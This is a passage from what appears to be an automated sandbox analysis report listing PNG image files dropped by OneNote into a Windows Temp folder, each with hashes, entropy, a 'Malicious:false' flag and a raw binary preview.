                                                                                                                                                                                                          Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{0ED24408-E9FC-4EA6-9C53-E391E277602C}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{1115FCDA-DA89-4D95-952B-35045E3EB3E1}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{11EED8F9-26CB-449A-858B-7066B58712C3}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{123A8175-0846-4F7B-958E-F86592FDFB92}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{1461D12C-9BF4-4117-A6A2-984E49B07EE2}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{1488CF78-5E71-4C68-858F-F32937387BC9}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{155BA984-FAD2-4D64-915A-7496A7C6011E}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{157EEC4D-3D81-4613-A49D-8B51C05E80C6}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{177E29B9-5167-46E5-B4AB-934DCD018127}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{1818EABF-355F-44DF-83A6-401053EBD528}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{1ABE104F-BE1D-46F0-9DCC-03B94B85B0D9}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{1D5CBA6B-0586-489E-AC02-11BF76D6EE9E}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
